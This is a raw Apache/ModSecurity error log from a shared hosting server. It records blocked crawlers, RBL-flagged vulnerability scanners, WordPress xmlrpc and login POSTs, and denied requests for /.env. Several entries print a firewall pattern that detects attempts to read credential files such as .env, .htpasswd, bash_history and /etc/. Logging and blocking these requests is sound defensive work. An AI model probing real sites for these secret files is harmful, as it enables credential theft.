[Tue May 26 15:37:57.159729 2026] [security2:error] [pid 724639:tid 724812] [client 85.208.96.197:17700] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVw_RKJRbiNp3eWdT2UrQAAALA"]
[Tue May 26 15:37:57.318072 2026] [security2:error] [pid 724639:tid 724852] [client 223.123.38.127:15205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw_RKJRbiNp3eWdT2UugAAANg"]
[Tue May 26 15:37:57.318178 2026] [security2:error] [pid 724639:tid 724852] [client 223.123.38.127:15205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw_RKJRbiNp3eWdT2UugAAANg"]
[Tue May 26 15:37:58.494041 2026] [security2:error] [pid 724639:tid 724887] [client 47.148.117.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw_hKJRbiNp3eWdT2U1gAAAPs"]
[Tue May 26 15:37:59.527879 2026] [security2:error] [pid 724639:tid 724836] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw_xKJRbiNp3eWdT2U7AAAAMg"]
[Tue May 26 15:38:00.057030 2026] [security2:error] [pid 724639:tid 724819] [client 114.119.155.228:48023] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVxABKJRbiNp3eWdT2VAgAAALc"], referer: http://haddingtonwines.com/cart?remove_item=d0ac1ed0c5cb9ecbca3d2496ec1ad984
[Tue May 26 15:38:01.814320 2026] [autoindex:error] [pid 724639:tid 724775] [client 20.17.99.187:57004] AH01276: Cannot serve directory /home2/onesomzc/public_html/www.quickdeliveryexp.com/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:38:02.922991 2026] [security2:error] [pid 724639:tid 724777] [client 66.249.66.37:42377] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "plenitudotonal.com"] [uri "/php/index.php"] [unique_id "ahVxAhKJRbiNp3eWdT2VNQAAAI0"]
[Tue May 26 15:38:03.401930 2026] [security2:error] [pid 724639:tid 724839] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxAhKJRbiNp3eWdT2VRQAAAMs"]
[Tue May 26 15:38:05.505642 2026] [security2:error] [pid 724639:tid 724850] [client 176.65.139.234:54564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env"] [unique_id "ahVxBRKJRbiNp3eWdT2VlwAAANY"]
[Tue May 26 15:38:05.658776 2026] [security2:error] [pid 724639:tid 724885] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxBRKJRbiNp3eWdT2VjwAAAPk"]
[Tue May 26 15:38:06.114092 2026] [security2:error] [pid 724639:tid 724801] [client 104.28.68.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVxBBKJRbiNp3eWdT2VdgAAAKU"]
[Tue May 26 15:38:08.374340 2026] [security2:error] [pid 724639:tid 724869] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxBxKJRbiNp3eWdT2V_QAAAOk"]
[Tue May 26 15:38:10.589239 2026] [security2:error] [pid 724639:tid 724869] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxChKJRbiNp3eWdT2WRQAAAOk"]
[Tue May 26 15:38:12.710146 2026] [security2:error] [pid 724639:tid 724884] [client 114.119.129.158:60215] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kardashevtechnologies.com"] [uri "/shaded-goddess"] [unique_id "ahVxDBKJRbiNp3eWdT2WkQAAAPg"], referer: https://www.kardashevtechnologies.com/
[Tue May 26 15:38:12.808800 2026] [core:crit] [pid 724639:tid 724833] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:38:12.845787 2026] [security2:error] [pid 724639:tid 724875] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxDBKJRbiNp3eWdT2WhAAAAO8"]
[Tue May 26 15:38:13.062181 2026] [security2:error] [pid 724639:tid 724891] [client 223.109.255.206:48195] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxDBKJRbiNp3eWdT2WmAAAAP8"], referer: http://pic.sogou.com
[Tue May 26 15:38:13.383929 2026] [security2:error] [pid 724639:tid 724789] [client 223.123.38.127:15206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxDRKJRbiNp3eWdT2WpQAAAJk"]
[Tue May 26 15:38:13.384048 2026] [security2:error] [pid 724639:tid 724789] [client 223.123.38.127:15206] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxDRKJRbiNp3eWdT2WpQAAAJk"]
[Tue May 26 15:38:14.736131 2026] [security2:error] [pid 724639:tid 724889] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxDhKJRbiNp3eWdT2W0AAAAP0"], referer: https://www.bloggertarget.com
[Tue May 26 15:38:14.956633 2026] [security2:error] [pid 724639:tid 724832] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxDhKJRbiNp3eWdT2WzQAAAMQ"]
[Tue May 26 15:38:16.626853 2026] [security2:error] [pid 724639:tid 724818] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxEBKJRbiNp3eWdT2W_wAAALY"]
[Tue May 26 15:38:16.676426 2026] [security2:error] [pid 724639:tid 724807] [client 176.65.139.235:30368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env"] [unique_id "ahVxEBKJRbiNp3eWdT2XDwAAAKs"]
[Tue May 26 15:38:19.258580 2026] [security2:error] [pid 724639:tid 724886] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxEhKJRbiNp3eWdT2XSwAAAPo"]
[Tue May 26 15:38:20.999717 2026] [security2:error] [pid 724639:tid 724810] [client 223.123.38.127:15207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxFBKJRbiNp3eWdT2XgwAAAK4"]
[Tue May 26 15:38:20.999890 2026] [security2:error] [pid 724639:tid 724810] [client 223.123.38.127:15207] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxFBKJRbiNp3eWdT2XgwAAAK4"]
[Tue May 26 15:38:21.684574 2026] [security2:error] [pid 724639:tid 724838] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxFRKJRbiNp3eWdT2XjAAAAMo"]
[Tue May 26 15:38:23.394834 2026] [security2:error] [pid 724639:tid 724808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxFhKJRbiNp3eWdT2XvwAAAKw"]
[Tue May 26 15:38:23.776664 2026] [security2:error] [pid 724639:tid 724703] [remote 103.11.102.106:57930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVxFxKJRbiNp3eWdT2X0gAAwD8"]
[Tue May 26 15:38:24.614178 2026] [security2:error] [pid 724639:tid 724843] [client 47.148.93.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxGBKJRbiNp3eWdT2X3gAAAM8"]
[Tue May 26 15:38:24.901431 2026] [security2:error] [pid 724639:tid 724852] [client 158.62.221.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxGBKJRbiNp3eWdT2X9gAAANg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:38:26.295273 2026] [security2:error] [pid 724639:tid 724847] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxGRKJRbiNp3eWdT2YEgAAANM"]
[Tue May 26 15:38:27.910409 2026] [security2:error] [pid 724639:tid 724876] [client 158.62.221.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxGxKJRbiNp3eWdT2YSAAAAPA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460809&moderation-hash=73b0cbe0ac89cadd9288c857cd3e5de5
[Tue May 26 15:38:28.462245 2026] [security2:error] [pid 724639:tid 724785] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxHBKJRbiNp3eWdT2YUgAAAJU"]
[Tue May 26 15:38:30.714584 2026] [security2:error] [pid 724639:tid 724807] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxHhKJRbiNp3eWdT2YjQAAAKs"]
[Tue May 26 15:38:31.566866 2026] [security2:error] [pid 724639:tid 724821] [client 5.255.231.76:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVxHxKJRbiNp3eWdT2YyAAAALk"]
[Tue May 26 15:38:32.947002 2026] [security2:error] [pid 724639:tid 724828] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxIBKJRbiNp3eWdT2ZBwAAAMA"]
[Tue May 26 15:38:33.241299 2026] [security2:error] [pid 724639:tid 724781] [client 223.123.38.127:15208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxIRKJRbiNp3eWdT2ZFgAAAJE"]
[Tue May 26 15:38:33.241478 2026] [security2:error] [pid 724639:tid 724781] [client 223.123.38.127:15208] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxIRKJRbiNp3eWdT2ZFgAAAJE"]
[Tue May 26 15:38:35.208789 2026] [security2:error] [pid 724639:tid 724882] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxIhKJRbiNp3eWdT2ZPwAAAPY"]
[Tue May 26 15:38:36.363969 2026] [security2:error] [pid 724639:tid 724792] [client 165.140.119.146:65223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVxJBKJRbiNp3eWdT2ZZwAAAJw"], referer: https://www.bloggertarget.com
[Tue May 26 15:38:36.364151 2026] [security2:error] [pid 724639:tid 724792] [client 165.140.119.146:65223] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVxJBKJRbiNp3eWdT2ZZwAAAJw"], referer: https://www.bloggertarget.com
[Tue May 26 15:38:36.858797 2026] [security2:error] [pid 724639:tid 724796] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxJBKJRbiNp3eWdT2ZdAAAAKA"]
[Tue May 26 15:38:37.049782 2026] [security2:error] [pid 724639:tid 724894] [client 158.62.221.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxJBKJRbiNp3eWdT2ZiQAAAQI"], referer: https://anujtradingco.com
[Tue May 26 15:38:39.661132 2026] [security2:error] [pid 724639:tid 724775] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxJxKJRbiNp3eWdT2ZxAAAAIs"]
[Tue May 26 15:38:40.953167 2026] [security2:error] [pid 724639:tid 724812] [client 223.123.38.127:15209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxKBKJRbiNp3eWdT2Z7wAAALA"]
[Tue May 26 15:38:40.953320 2026] [security2:error] [pid 724639:tid 724812] [client 223.123.38.127:15209] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxKBKJRbiNp3eWdT2Z7wAAALA"]
[Tue May 26 15:38:41.504598 2026] [security2:error] [pid 724639:tid 724860] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxKRKJRbiNp3eWdT2Z-AAAAOA"]
[Tue May 26 15:38:41.675197 2026] [http2:info] [pid 733610:tid 733610] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:38:43.421190 2026] [security2:error] [pid 733610:tid 733819] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxK8LL_4PasUNKBsfBnQAAAE8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:38:44.065860 2026] [security2:error] [pid 733610:tid 733823] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxK8LL_4PasUNKBsfBpQAAAFM"]
[Tue May 26 15:38:44.167192 2026] [security2:error] [pid 733610:tid 733859] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxLMLL_4PasUNKBsfBsgAAAHc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460628&moderation-hash=8e6d757da7318ad697c4f61b282022af
[Tue May 26 15:38:44.873805 2026] [security2:error] [pid 733610:tid 733747] [client 153.75.250.144:41592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.poonawallatennisacademy.moes-art.com"] [uri "/wp-content/plugins/dropbox-folder-share/HynoTech/UsosGenerales/js/editor-view.php"] [unique_id "ahVxLMLL_4PasUNKBsfBxwAAAAc"]
[Tue May 26 15:38:44.881702 2026] [security2:error] [pid 733610:tid 733757] [client 153.75.250.144:41586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.poonawallatennisacademy.com"] [uri "/wp-content/plugins/dropbox-folder-share/HynoTech/UsosGenerales/js/editor-view.php"] [unique_id "ahVxLMLL_4PasUNKBsfBygAAABE"]
[Tue May 26 15:38:45.085311 2026] [security2:error] [pid 733610:tid 733861] [client 103.153.130.62:54525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxLMLL_4PasUNKBsfBxQAAAHk"]
[Tue May 26 15:38:45.085555 2026] [security2:error] [pid 733610:tid 733861] [client 103.153.130.62:54525] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxLMLL_4PasUNKBsfBxQAAAHk"]
[Tue May 26 15:38:45.803311 2026] [security2:error] [pid 733610:tid 733781] [client 5.255.126.59:57684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxLcLL_4PasUNKBsfB2gAAACk"]
[Tue May 26 15:38:46.023285 2026] [security2:error] [pid 733610:tid 733623] [remote 216.73.216.30:50994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxLcLL_4PasUNKBsfB-QAAQAw"]
[Tue May 26 15:38:46.385774 2026] [security2:error] [pid 733610:tid 733622] [remote 216.73.216.30:50994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxLsLL_4PasUNKBsfCEgAAQAs"]
[Tue May 26 15:38:46.487682 2026] [security2:error] [pid 733610:tid 733841] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxLsLL_4PasUNKBsfB_gAAAGU"]
[Tue May 26 15:38:46.617467 2026] [security2:error] [pid 733610:tid 733633] [remote 216.73.216.30:50994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxLsLL_4PasUNKBsfCHAAAQBY"]
[Tue May 26 15:38:46.824807 2026] [security2:error] [pid 733610:tid 733750] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxLsLL_4PasUNKBsfCHwAAAAo"]
[Tue May 26 15:38:47.273196 2026] [security2:error] [pid 733610:tid 733643] [remote 216.73.216.30:50994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxL8LL_4PasUNKBsfCRAAAQCA"]
